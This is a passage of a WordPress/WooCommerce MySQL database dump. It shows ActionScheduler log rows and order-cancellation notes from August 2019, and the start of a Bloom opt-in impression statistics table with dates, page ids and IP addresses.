complete',0,'1','ActionScheduler','action_log',0,0),(9320,32919,'ActionScheduler','','','','2019-08-17 15:53:06','2019-08-17 15:53:06','action created',0,'1','ActionScheduler','action_log',0,0),(9321,32918,'ActionScheduler','','','','2019-08-17 15:53:06','2019-08-17 15:53:06','action started',0,'1','ActionScheduler','action_log',0,0),(9322,32918,'ActionScheduler','','','','2019-08-17 15:53:06','2019-08-17 15:53:06','action complete',0,'1','ActionScheduler','action_log',0,0),(9323,32920,'ActionScheduler','','','','2019-08-17 15:53:06','2019-08-17 15:53:06','action created',0,'1','ActionScheduler','action_log',0,0),(9324,32919,'ActionScheduler','','','','2019-08-17 16:56:05','2019-08-17 16:56:05','action started',0,'1','ActionScheduler','action_log',0,0),(9325,32919,'ActionScheduler','','','','2019-08-17 16:56:05','2019-08-17 16:56:05','action complete',0,'1','ActionScheduler','action_log',0,0),(9326,32921,'ActionScheduler','','','','2019-08-17 16:56:05','2019-08-17 16:56:05','action created',0,'1','ActionScheduler','action_log',0,0),(9327,32920,'ActionScheduler','','','','2019-08-17 16:56:05','2019-08-17 16:56:05','action started',0,'1','ActionScheduler','action_log',0,0),(9328,32920,'ActionScheduler','','','','2019-08-17 16:56:05','2019-08-17 16:56:05','action complete',0,'1','ActionScheduler','action_log',0,0),(9329,32922,'ActionScheduler','','','','2019-08-17 16:56:05','2019-08-17 16:56:05','action created',0,'1','ActionScheduler','action_log',0,0),(9330,32921,'ActionScheduler','','','','2019-08-17 18:07:09','2019-08-17 18:07:09','action started',0,'1','ActionScheduler','action_log',0,0),(9331,32921,'ActionScheduler','','','','2019-08-17 18:07:09','2019-08-17 18:07:09','action complete',0,'1','ActionScheduler','action_log',0,0),(9332,32923,'ActionScheduler','','','','2019-08-17 18:07:10','2019-08-17 18:07:10','action created',0,'1','ActionScheduler','action_log',0,0),(9333,32922,'ActionScheduler','','','','2019-08-17 18:07:10','2019-08-17 18:07:10','action started',0,'1','ActionScheduler','action_log',0,0),(9334,32922,'ActionScheduler','','','','2019-08-17 18:07:10','2019-08-17 18:07:10','action complete',0,'1','ActionScheduler','action_log',0,0),(9335,32924,'ActionScheduler','','','','2019-08-17 18:07:10','2019-08-17 18:07:10','action created',0,'1','ActionScheduler','action_log',0,0),(9336,32923,'ActionScheduler','','','','2019-08-17 19:10:25','2019-08-17 19:10:25','action started',0,'1','ActionScheduler','action_log',0,0),(9337,32923,'ActionScheduler','','','','2019-08-17 19:10:25','2019-08-17 19:10:25','action complete',0,'1','ActionScheduler','action_log',0,0),(9338,32925,'ActionScheduler','','','','2019-08-17 19:10:25','2019-08-17 19:10:25','action created',0,'1','ActionScheduler','action_log',0,0),(9339,32924,'ActionScheduler','','','','2019-08-17 19:10:25','2019-08-17 19:10:25','action started',0,'1','ActionScheduler','action_log',0,0),(9340,32924,'ActionScheduler','','','','2019-08-17 19:10:25','2019-08-17 19:10:25','action complete',0,'1','ActionScheduler','action_log',0,0),(9341,32926,'ActionScheduler','','','','2019-08-17 19:10:25','2019-08-17 19:10:25','action created',0,'1','ActionScheduler','action_log',0,0),(9342,32925,'ActionScheduler','','','','2019-08-17 20:23:40','2019-08-17 20:23:40','action started',0,'1','ActionScheduler','action_log',0,0),(9343,32925,'ActionScheduler','','','','2019-08-17 20:23:40','2019-08-17 20:23:40','action complete',0,'1','ActionScheduler','action_log',0,0),(9344,32927,'ActionScheduler','','','','2019-08-17 20:23:40','2019-08-17 20:23:40','action created',0,'1','ActionScheduler','action_log',0,0),(9345,32926,'ActionScheduler','','','','2019-08-17 20:23:40','2019-08-17 20:23:40','action started',0,'1','ActionScheduler','action_log',0,0),(9346,32926,'ActionScheduler','','','','2019-08-17 20:23:40','2019-08-17 20:23:40','action complete',0,'1','ActionScheduler','action_log',0,0),(9347,32928,'ActionScheduler','','','','2019-08-17 20:23:40','2019-08-17 20:23:40','action created',0,'1','ActionScheduler','action_log',0,0),(9348,32927,'ActionScheduler','','','','2019-08-17 21:34:46','2019-08-17 21:34:46','action started',0,'1','ActionScheduler','action_log',0,0),(9349,32927,'ActionScheduler','','','','2019-08-17 21:34:46','2019-08-17 21:34:46','action complete',0,'1','ActionScheduler','action_log',0,0),(9350,32929,'ActionScheduler','','','','2019-08-17 21:34:46','2019-08-17 21:34:46','action created',0,'1','ActionScheduler','action_log',0,0),(9351,32928,'ActionScheduler','','','','2019-08-17 21:34:46','2019-08-17 21:34:46','action started',0,'1','ActionScheduler','action_log',0,0),(9352,32928,'ActionScheduler','','','','2019-08-17 21:34:46','2019-08-17 21:34:46','action complete',0,'1','ActionScheduler','action_log',0,0),(9353,32930,'ActionScheduler','','','','2019-08-17 21:34:46','2019-08-17 21:34:46','action created',0,'1','ActionScheduler','action_log',0,0),(9354,32929,'ActionScheduler','','','','2019-08-17 22:43:54','2019-08-17 22:43:54','action started',0,'1','ActionScheduler','action_log',0,0),(9355,32929,'ActionScheduler','','','','2019-08-17 22:43:54','2019-08-17 22:43:54','action complete',0,'1','ActionScheduler','action_log',0,0),(9356,32931,'ActionScheduler','','','','2019-08-17 22:43:54','2019-08-17 22:43:54','action created',0,'1','ActionScheduler','action_log',0,0),(9357,32930,'ActionScheduler','','','','2019-08-17 22:43:54','2019-08-17 22:43:54','action started',0,'1','ActionScheduler','action_log',0,0),(9358,32930,'ActionScheduler','','','','2019-08-17 22:43:54','2019-08-17 22:43:54','action complete',0,'1','ActionScheduler','action_log',0,0),(9359,32932,'ActionScheduler','','','','2019-08-17 22:43:54','2019-08-17 22:43:54','action created',0,'1','ActionScheduler','action_log',0,0),(9360,32931,'ActionScheduler','','','','2019-08-17 23:55:59','2019-08-17 23:55:59','action started',0,'1','ActionScheduler','action_log',0,0),(9361,32931,'ActionScheduler','','','','2019-08-17 23:55:59','2019-08-17 23:55:59','action complete',0,'1','ActionScheduler','action_log',0,0),(9362,32933,'ActionScheduler','','','','2019-08-17 23:55:59','2019-08-17 23:55:59','action created',0,'1','ActionScheduler','action_log',0,0),(9363,32932,'ActionScheduler','','','','2019-08-17 23:55:59','2019-08-17 23:55:59','action started',0,'1','ActionScheduler','action_log',0,0),(9364,32932,'ActionScheduler','','','','2019-08-17 23:55:59','2019-08-17 23:55:59','action complete',0,'1','ActionScheduler','action_log',0,0),(9365,32934,'ActionScheduler','','','','2019-08-17 23:55:59','2019-08-17 23:55:59','action created',0,'1','ActionScheduler','action_log',0,0),(9366,32933,'ActionScheduler','','','','2019-08-18 01:12:25','2019-08-18 01:12:25','action started',0,'1','ActionScheduler','action_log',0,0),(9367,32933,'ActionScheduler','','','','2019-08-18 01:12:25','2019-08-18 01:12:25','action complete',0,'1','ActionScheduler','action_log',0,0),(9368,32935,'ActionScheduler','','','','2019-08-18 01:12:25','2019-08-18 01:12:25','action created',0,'1','ActionScheduler','action_log',0,0),(9369,32934,'ActionScheduler','','','','2019-08-18 01:12:25','2019-08-18 01:12:25','action started',0,'1','ActionScheduler','action_log',0,0),(9370,32934,'ActionScheduler','','','','2019-08-18 01:12:25','2019-08-18 01:12:25','action complete',0,'1','ActionScheduler','action_log',0,0),(9371,32936,'ActionScheduler','','','','2019-08-18 01:12:25','2019-08-18 01:12:25','action created',0,'1','ActionScheduler','action_log',0,0),(9372,32935,'ActionScheduler','','','','2019-08-18 02:51:25','2019-08-18 02:51:25','action started',0,'1','ActionScheduler','action_log',0,0),(9373,32935,'ActionScheduler','','','','2019-08-18 02:51:25','2019-08-18 02:51:25','action complete',0,'1','ActionScheduler','action_log',0,0),(9374,32937,'ActionScheduler','','','','2019-08-18 02:51:25','2019-08-18 02:51:25','action created',0,'1','ActionScheduler','action_log',0,0),(9375,32936,'ActionScheduler','','','','2019-08-18 02:51:25','2019-08-18 02:51:25','action started',0,'1','ActionScheduler','action_log',0,0),(9376,32936,'ActionScheduler','','','','2019-08-18 02:51:25','2019-08-18 02:51:25','action complete',0,'1','ActionScheduler','action_log',0,0),(9377,32938,'ActionScheduler','','','','2019-08-18 02:51:25','2019-08-18 02:51:25','action created',0,'1','ActionScheduler','action_log',0,0),(9378,32937,'ActionScheduler','','','','2019-08-18 05:37:41','2019-08-18 05:37:41','action started',0,'1','ActionScheduler','action_log',0,0),(9379,32937,'ActionScheduler','','','','2019-08-18 05:37:41','2019-08-18 05:37:41','action complete',0,'1','ActionScheduler','action_log',0,0),(9380,32939,'ActionScheduler','','','','2019-08-18 05:37:42','2019-08-18 05:37:42','action created',0,'1','ActionScheduler','action_log',0,0),(9381,32938,'ActionScheduler','','','','2019-08-18 05:37:42','2019-08-18 05:37:42','action started',0,'1','ActionScheduler','action_log',0,0),(9382,32938,'ActionScheduler','','','','2019-08-18 05:37:42','2019-08-18 05:37:42','action complete',0,'1','ActionScheduler','action_log',0,0),(9383,32940,'ActionScheduler','','','','2019-08-18 05:37:42','2019-08-18 05:37:42','action created',0,'1','ActionScheduler','action_log',0,0),(9384,32939,'ActionScheduler','','','','2019-08-18 07:58:47','2019-08-18 07:58:47','action started',0,'1','ActionScheduler','action_log',0,0),(9385,32939,'ActionScheduler','','','','2019-08-18 07:58:47','2019-08-18 07:58:47','action complete',0,'1','ActionScheduler','action_log',0,0),(9386,32941,'ActionScheduler','','','','2019-08-18 07:58:47','2019-08-18 07:58:47','action created',0,'1','ActionScheduler','action_log',0,0),(9387,32940,'ActionScheduler','','','','2019-08-18 07:58:47','2019-08-18 07:58:47','action started',0,'1','ActionScheduler','action_log',0,0),(9388,32940,'ActionScheduler','','','','2019-08-18 07:58:47','2019-08-18 07:58:47','action complete',0,'1','ActionScheduler','action_log',0,0),(9389,32942,'ActionScheduler','','','','2019-08-18 07:58:48','2019-08-18 07:58:48','action created',0,'1','ActionScheduler','action_log',0,0),(9395,32944,'ActionScheduler','','','','2019-08-18 11:38:13','2019-08-18 11:38:13','action created',0,'1','ActionScheduler','action_log',0,0),(9401,32946,'ActionScheduler','','','','2019-08-18 12:40:45','2019-08-18 12:40:45','action created',0,'1','ActionScheduler','action_log',0,0),(9707,33061,'ActionScheduler','','','','2019-08-21 12:47:55','2019-08-21 12:47:55','action created',0,'1','ActionScheduler','action_log',0,0),(9713,33063,'ActionScheduler','','','','2019-08-21 13:58:53','2019-08-21 13:58:53','action created',0,'1','ActionScheduler','action_log',0,0),(9714,33062,'ActionScheduler','','','','2019-08-21 15:08:31','2019-08-21 15:08:31','action started',0,'1','ActionScheduler','action_log',0,0),(9715,33062,'ActionScheduler','','','','2019-08-21 15:08:31','2019-08-21 15:08:31','action complete',0,'1','ActionScheduler','action_log',0,0),(9716,33064,'ActionScheduler','','','','2019-08-21 15:08:31','2019-08-21 15:08:31','action created',0,'1','ActionScheduler','action_log',0,0),(9717,33063,'ActionScheduler','','','','2019-08-21 15:08:31','2019-08-21 15:08:31','action started',0,'1','ActionScheduler','action_log',0,0),(9718,33063,'ActionScheduler','','','','2019-08-21 15:08:31','2019-08-21 15:08:31','action complete',0,'1','ActionScheduler','action_log',0,0),(9719,33065,'ActionScheduler','','','','2019-08-21 15:08:31','2019-08-21 15:08:31','action created',0,'1','ActionScheduler','action_log',0,0),(9731,33069,'ActionScheduler','','','','2019-08-21 17:27:42','2019-08-21 17:27:42','action created',0,'1','ActionScheduler','action_log',0,0),(9821,33100,'ActionScheduler','','','','2019-08-22 10:35:11','2019-08-22 10:35:11','action created',0,'1','ActionScheduler','action_log',0,0),(9833,33104,'ActionScheduler','','','','2019-08-22 12:51:25','2019-08-22 12:51:25','action created',0,'1','ActionScheduler','action_log',0,0),(9840,33127,'ActionScheduler','','','','2019-08-22 14:00:17','2019-08-22 14:00:17','action created',0,'1','ActionScheduler','action_log',0,0),(9841,33128,'ActionScheduler','','','','2019-08-22 14:00:17','2019-08-22 14:00:17','action created',0,'1','ActionScheduler','action_log',0,0),(9842,33129,'ActionScheduler','','','','2019-08-22 14:00:17','2019-08-22 14:00:17','action created',0,'1','ActionScheduler','action_log',0,0),(9843,33127,'ActionScheduler','','','','2019-08-22 14:00:19','2019-08-22 14:00:19','action started',0,'1','ActionScheduler','action_log',0,0),(9844,33127,'ActionScheduler','','','','2019-08-22 14:00:19','2019-08-22 14:00:19','action complete',0,'1','ActionScheduler','action_log',0,0),(9845,33128,'ActionScheduler','','','','2019-08-22 14:00:19','2019-08-22 14:00:19','action started',0,'1','ActionScheduler','action_log',0,0),(9846,33128,'ActionScheduler','','','','2019-08-22 14:00:19','2019-08-22 14:00:19','action complete',0,'1','ActionScheduler','action_log',0,0),(9847,33129,'ActionScheduler','','','','2019-08-22 14:00:19','2019-08-22 14:00:19','action started',0,'1','ActionScheduler','action_log',0,0),(9848,33129,'ActionScheduler','','','','2019-08-22 14:00:19','2019-08-22 14:00:19','action complete',0,'1','ActionScheduler','action_log',0,0),(9849,33123,'ActionScheduler','','','','2019-08-22 14:59:15','2019-08-22 14:59:15','action started',0,'1','ActionScheduler','action_log',0,0),(9850,33123,'ActionScheduler','','','','2019-08-22 14:59:15','2019-08-22 14:59:15','action complete',0,'1','ActionScheduler','action_log',0,0),(9851,33145,'ActionScheduler','','','','2019-08-22 14:59:15','2019-08-22 14:59:15','action created',0,'1','ActionScheduler','action_log',0,0),(9852,33124,'ActionScheduler','','','','2019-08-22 14:59:15','2019-08-22 14:59:15','action started',0,'1','ActionScheduler','action_log',0,0),(9853,33124,'ActionScheduler','','','','2019-08-22 14:59:15','2019-08-22 14:59:15','action complete',0,'1','ActionScheduler','action_log',0,0),(9854,33146,'ActionScheduler','','','','2019-08-22 14:59:15','2019-08-22 14:59:15','action created',0,'1','ActionScheduler','action_log',0,0),(9855,33145,'ActionScheduler','','','','2019-08-22 16:03:50','2019-08-22 16:03:50','action started',0,'1','ActionScheduler','action_log',0,0),(9856,33145,'ActionScheduler','','','','2019-08-22 16:03:50','2019-08-22 16:03:50','action complete',0,'1','ActionScheduler','action_log',0,0),(9857,33147,'ActionScheduler','','','','2019-08-22 16:03:50','2019-08-22 16:03:50','action created',0,'1','ActionScheduler','action_log',0,0),(9858,33146,'ActionScheduler','','','','2019-08-22 16:03:50','2019-08-22 16:03:50','action started',0,'1','ActionScheduler','action_log',0,0),(9859,33146,'ActionScheduler','','','','2019-08-22 16:03:50','2019-08-22 16:03:50','action complete',0,'1','ActionScheduler','action_log',0,0),(9860,33148,'ActionScheduler','','','','2019-08-22 16:03:50','2019-08-22 16:03:50','action created',0,'1','ActionScheduler','action_log',0,0),(9890,33158,'ActionScheduler','','','','2019-08-22 23:27:55','2019-08-22 23:27:55','action created',0,'1','ActionScheduler','action_log',0,0),(9891,33157,'ActionScheduler','','','','2019-08-23 00:43:41','2019-08-23 00:43:41','action started',0,'1','ActionScheduler','action_log',0,0),(9892,33157,'ActionScheduler','','','','2019-08-23 00:43:41','2019-08-23 00:43:41','action complete',0,'1','ActionScheduler','action_log',0,0),(9893,33159,'ActionScheduler','','','','2019-08-23 00:43:41','2019-08-23 00:43:41','action created',0,'1','ActionScheduler','action_log',0,0),(9894,33158,'ActionScheduler','','','','2019-08-23 00:43:41','2019-08-23 00:43:41','action started',0,'1','ActionScheduler','action_log',0,0),(9895,33158,'ActionScheduler','','','','2019-08-23 00:43:41','2019-08-23 00:43:41','action complete',0,'1','ActionScheduler','action_log',0,0),(9896,33160,'ActionScheduler','','','','2019-08-23 00:43:42','2019-08-23 00:43:42','action created',0,'1','ActionScheduler','action_log',0,0),(9902,33162,'ActionScheduler','','','','2019-08-23 01:56:16','2019-08-23 01:56:16','action created',0,'1','ActionScheduler','action_log',0,0),(9918,33166,'ActionScheduler','','','','2019-08-23 05:15:13','2019-08-23 05:15:13','action started',0,'1','ActionScheduler','action_log',0,0),(9919,33166,'ActionScheduler','','','','2019-08-23 05:15:13','2019-08-23 05:15:13','action complete',0,'1','ActionScheduler','action_log',0,0),(9920,33168,'ActionScheduler','','','','2019-08-23 05:15:13','2019-08-23 05:15:13','action created',0,'1','ActionScheduler','action_log',0,0),(9944,33176,'ActionScheduler','','','','2019-08-23 09:28:24','2019-08-23 09:28:24','action created',0,'1','ActionScheduler','action_log',0,0),(9962,33182,'ActionScheduler','','','','2019-08-23 13:12:44','2019-08-23 13:12:44','action created',0,'1','ActionScheduler','action_log',0,0),(9968,33184,'ActionScheduler','','','','2019-08-23 14:36:08','2019-08-23 14:36:08','action created',0,'1','ActionScheduler','action_log',0,0),(10011,33197,'ActionScheduler','','','','2019-08-24 00:21:29','2019-08-24 00:21:29','action started',0,'1','ActionScheduler','action_log',0,0),(10012,33197,'ActionScheduler','','','','2019-08-24 00:21:29','2019-08-24 00:21:29','action complete',0,'1','ActionScheduler','action_log',0,0),(10013,33199,'ActionScheduler','','','','2019-08-24 00:21:29','2019-08-24 00:21:29','action created',0,'1','ActionScheduler','action_log',0,0),(10014,33198,'ActionScheduler','','','','2019-08-24 00:21:29','2019-08-24 00:21:29','action started',0,'1','ActionScheduler','action_log',0,0),(10015,33198,'ActionScheduler','','','','2019-08-24 00:21:29','2019-08-24 00:21:29','action complete',0,'1','ActionScheduler','action_log',0,0),(10016,33200,'ActionScheduler','','','','2019-08-24 00:21:29','2019-08-24 00:21:29','action created',0,'1','ActionScheduler','action_log',0,0),(10040,33208,'ActionScheduler','','','','2019-08-24 06:15:25','2019-08-24 06:15:25','action created',0,'1','ActionScheduler','action_log',0,0),(10077,33224,'ActionScheduler','','','','2019-08-24 12:38:34','2019-08-24 12:38:34','action created',0,'1','ActionScheduler','action_log',0,0),(10078,33226,'ActionScheduler','','','','2019-08-24 12:38:34','2019-08-24 12:38:34','action created',0,'1','ActionScheduler','action_log',0,0),(10079,33227,'ActionScheduler','','','','2019-08-24 12:38:34','2019-08-24 12:38:34','action created',0,'1','ActionScheduler','action_log',0,0),(10080,33228,'ActionScheduler','','','','2019-08-24 12:39:00','2019-08-24 12:39:00','action created',0,'1','ActionScheduler','action_log',0,0),(10081,33225,'WooCommerce','woocommerce@companyregistration.online','','','2019-08-24 14:39:00','2019-08-24 12:39:00','Order cancelled by customer. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(10082,33224,'ActionScheduler','','','','2019-08-24 12:39:29','2019-08-24 12:39:29','action started',0,'1','ActionScheduler','action_log',0,0),(10083,33224,'ActionScheduler','','','','2019-08-24 12:39:29','2019-08-24 12:39:29','action complete',0,'1','ActionScheduler','action_log',0,0),(10084,33227,'ActionScheduler','','','','2019-08-24 12:39:29','2019-08-24 12:39:29','action started',0,'1','ActionScheduler','action_log',0,0),(10085,33227,'ActionScheduler','','','','2019-08-24 12:39:31','2019-08-24 12:39:31','action complete',0,'1','ActionScheduler','action_log',0,0),(10086,33226,'ActionScheduler','','','','2019-08-24 12:39:31','2019-08-24 12:39:31','action started',0,'1','ActionScheduler','action_log',0,0),(10087,33226,'ActionScheduler','','','','2019-08-24 12:39:31','2019-08-24 12:39:31','action complete',0,'1','ActionScheduler','action_log',0,0),(10088,33228,'ActionScheduler','','','','2019-08-24 12:39:31','2019-08-24 12:39:31','action started',0,'1','ActionScheduler','action_log',0,0),(10089,33228,'ActionScheduler','','','','2019-08-24 12:39:31','2019-08-24 12:39:31','action complete',0,'1','ActionScheduler','action_log',0,0),(10096,33230,'WooCommerce','woocommerce@companyregistration.online','','','2019-08-24 15:11:22','2019-08-24 13:11:22','Order cancelled by customer. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(10097,33229,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action complete',0,'1','ActionScheduler','action_log',0,0),(10098,33232,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action started',0,'1','ActionScheduler','action_log',0,0),(10099,33232,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action complete',0,'1','ActionScheduler','action_log',0,0),(10100,33231,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action started',0,'1','ActionScheduler','action_log',0,0),(10101,33231,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action complete',0,'1','ActionScheduler','action_log',0,0),(10102,33234,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action started',0,'1','ActionScheduler','action_log',0,0),(10103,33234,'ActionScheduler','','','','2019-08-24 13:11:23','2019-08-24 13:11:23','action complete',0,'1','ActionScheduler','action_log',0,0),(10104,33233,'ActionScheduler','','','','2019-08-24 13:12:29','2019-08-24 13:12:29','action started',0,'1','ActionScheduler','action_log',0,0),(10105,33233,'ActionScheduler','','','','2019-08-24 13:12:29','2019-08-24 13:12:29','action complete',0,'1','ActionScheduler','action_log',0,0),(10106,33235,'ActionScheduler','','','','2019-08-24 13:31:07','2019-08-24 13:31:07','action created',0,'1','ActionScheduler','action_log',0,0),(10107,33237,'ActionScheduler','','','','2019-08-24 13:31:07','2019-08-24 13:31:07','action created',0,'1','ActionScheduler','action_log',0,0),(10108,33238,'ActionScheduler','','','','2019-08-24 13:31:07','2019-08-24 13:31:07','action created',0,'1','ActionScheduler','action_log',0,0),(10109,33235,'ActionScheduler','','','','2019-08-24 13:31:25','2019-08-24 13:31:25','action started',0,'1','ActionScheduler','action_log',0,0),(10110,33239,'ActionScheduler','','','','2019-08-24 13:31:25','2019-08-24 13:31:25','action created',0,'1','ActionScheduler','action_log',0,0),(10111,33236,'WooCommerce','woocommerce@companyregistration.online','','','2019-08-24 15:31:25','2019-08-24 13:31:25','Order cancelled by customer. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(10112,33235,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action complete',0,'1','ActionScheduler','action_log',0,0),(10113,33238,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action started',0,'1','ActionScheduler','action_log',0,0),(10114,33238,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action complete',0,'1','ActionScheduler','action_log',0,0),(10115,33237,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action started',0,'1','ActionScheduler','action_log',0,0),(10116,33237,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action complete',0,'1','ActionScheduler','action_log',0,0),(10117,33220,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action started',0,'1','ActionScheduler','action_log',0,0),(10118,33220,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action complete',0,'1','ActionScheduler','action_log',0,0),(10119,33240,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action created',0,'1','ActionScheduler','action_log',0,0),(10120,33221,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action started',0,'1','ActionScheduler','action_log',0,0),(10121,33221,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action complete',0,'1','ActionScheduler','action_log',0,0),(10122,33241,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action created',0,'1','ActionScheduler','action_log',0,0),(10123,33239,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action started',0,'1','ActionScheduler','action_log',0,0),(10124,33239,'ActionScheduler','','','','2019-08-24 13:31:27','2019-08-24 13:31:27','action complete',0,'1','ActionScheduler','action_log',0,0),(10208,33269,'ActionScheduler','','','','2019-08-25 07:56:12','2019-08-25 07:56:12','action created',0,'1','ActionScheduler','action_log',0,0),(10236,33277,'ActionScheduler','','','','2019-08-25 13:26:50','2019-08-25 13:26:50','action started',0,'1','ActionScheduler','action_log',0,0),(10237,33277,'ActionScheduler','','','','2019-08-25 13:26:50','2019-08-25 13:26:50','action complete',0,'1','ActionScheduler','action_log',0,0),(10238,33279,'ActionScheduler','','','','2019-08-25 13:26:50','2019-08-25 13:26:50','action created',0,'1','ActionScheduler','action_log',0,0),(10251,33282,'ActionScheduler','','','','2019-08-25 16:37:43','2019-08-25 16:37:43','action started',0,'1','ActionScheduler','action_log',0,0),(10252,33282,'ActionScheduler','','','','2019-08-25 16:37:43','2019-08-25 16:37:43','action complete',0,'1','ActionScheduler','action_log',0,0),(10253,33284,'ActionScheduler','','','','2019-08-25 16:37:44','2019-08-25 16:37:44','action created',0,'1','ActionScheduler','action_log',0,0),(10254,33283,'ActionScheduler','','','','2019-08-25 16:37:44','2019-08-25 16:37:44','action started',0,'1','ActionScheduler','action_log',0,0),(10255,33283,'ActionScheduler','','','','2019-08-25 16:37:44','2019-08-25 16:37:44','action complete',0,'1','ActionScheduler','action_log',0,0),(10256,33285,'ActionScheduler','','','','2019-08-25 16:37:44','2019-08-25 16:37:44','action created',0,'1','ActionScheduler','action_log',0,0),(10347,33330,'ActionScheduler','','','','2019-08-26 14:01:48','2019-08-26 14:01:48','action created',0,'1','ActionScheduler','action_log',0,0),(10348,33330,'ActionScheduler','','','','2019-08-26 14:02:40','2019-08-26 14:02:40','action started',0,'1','ActionScheduler','action_log',0,0),(10349,33330,'ActionScheduler','','','','2019-08-26 14:02:41','2019-08-26 14:02:41','action complete',0,'1','ActionScheduler','action_log',0,0),(10442,33364,'ActionScheduler','','','','2019-08-27 09:25:22','2019-08-27 09:25:22','action created',0,'1','ActionScheduler','action_log',0,0),(10443,33363,'ActionScheduler','','','','2019-08-27 09:25:22','2019-08-27 09:25:22','action started',0,'1','ActionScheduler','action_log',0,0),(10444,33363,'ActionScheduler','','','','2019-08-27 09:25:22','2019-08-27 09:25:22','action complete',0,'1','ActionScheduler','action_log',0,0),(10445,33365,'ActionScheduler','','','','2019-08-27 09:25:22','2019-08-27 09:25:22','action created',0,'1','ActionScheduler','action_log',0,0);
/*!40000 ALTER TABLE `wpxb_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_et_bloom_stats`
--

DROP TABLE IF EXISTS `wpxb_et_bloom_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_et_bloom_stats` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `record_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `record_type` varchar(3) COLLATE utf8mb4_unicode_ci NOT NULL,
  `optin_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `list_id` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `ip_address` varchar(45) COLLATE utf8mb4_unicode_ci NOT NULL,
  `page_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `removed_flag` tinyint(1) NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=679 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_et_bloom_stats`
--

LOCK TABLES `wpxb_et_bloom_stats` WRITE;
/*!40000 ALTER TABLE `wpxb_et_bloom_stats` DISABLE KEYS */;
INSERT INTO `wpxb_et_bloom_stats` VALUES (1,'2016-07-02 13:02:53','imp','optin_1','fb084be2ed','197.234.242.134','144',0),(2,'2016-12-09 14:42:53','imp','optin_1','2','162.158.74.151','75',0),(3,'2016-12-09 15:04:17','imp','optin_2','fb084be2ed','162.158.74.151','64',0),(4,'2016-12-09 15:55:21','imp','optin_1','2','162.158.74.151','76',0),(5,'2016-12-09 16:10:09','imp','optin_2','fb084be2ed','162.158.74.151','75',0),(6,'2016-12-09 16:30:44','imp','optin_1','2','162.158.74.151','64',0),(7,'2016-12-09 19:43:55','imp','optin_2','fb084be2ed','162.158.74.151','76',0),(8,'2016-12-09 19:53:49','imp','optin_1','2','162.158.74.151','67',0),(9,'2016-12-09 21:51:00','imp','optin_2','fb084be2ed','162.158.74.151','67',0),(10,'2016-12-09 22:06:18','imp','optin_1','2','162.158.74.151','69',0),(11,'2016-12-09 22:26:33','imp','optin_2','fb084be2ed','162.158.74.151','74',0),(12,'2016-12-10 02:03:29','imp','optin_2','fb084be2ed','162.158.74.151','76',0),(13,'2016-12-10 03:37:56','imp','optin_1','2','162.158.74.151','80',0),(14,'2016-12-10 06:21:30','imp','optin_1','2','162.158.74.151','237',0),(15,'2016-12-10 06:46:16','imp','optin_2','fb084be2ed','162.158.74.151','78',0),(16,'2016-12-10 07:35:33','imp','optin_1','2','162.158.74.151','77',0),(17,'2016-12-10 07:36:40','imp','optin_2','fb084be2ed','162.158.74.151','28',0),(18,'2016-12-10 08:00:20','imp','optin_1','2','162.158.74.151','59',0),(19,'2016-12-10 09:27:29','imp','optin_2','fb084be2ed','162.158.74.151','68',0),(20,'2016-12-10 09:53:11','imp','optin_1','2','162.158.74.151','65',0),(21,'2016-12-10 10:18:54','imp','optin_2','fb084be2ed','162.158.74.151','69',0),(22,'2016-12-10 11:14:05','imp','optin_1','2','162.158.74.151','62',0),(23,'2016-12-11 02:01:20','imp','optin_1','2','162.158.74.151','80',0),(24,'2016-12-12 14:10:13','imp','optin_2','fb084be2ed','162.158.74.151','28',0),(25,'2016-12-12 17:01:02','imp','optin_2','fb084be2ed','197.234.242.120','-1',0),(26,'2016-12-12 17:55:36','imp','optin_1','2','162.158.74.151','0',0),(27,'2016-12-12 21:59:27','imp','optin_2','fb084be2ed','162.158.69.47','0',0),(28,'2016-12-12 22:23:12','imp','optin_1','2','162.158.69.47','64',0),(29,'2016-12-13 02:02:36','imp','optin_2','fb084be2ed','162.158.69.47','0',0),(30,'2016-12-13 02:04:04','imp','optin_2','fb084be2ed','162.158.69.47','99',0),(31,'2016-12-13 02:18:06','imp','optin_2','fb084be2ed','162.158.69.47','99',0),(32,'2016-12-13 02:31:43','imp','optin_1','2','162.158.69.47','267',0),(33,'2016-12-13 04:20:09','imp','optin_2','fb084be2ed','162.158.69.47','184',0),(34,'2016-12-13 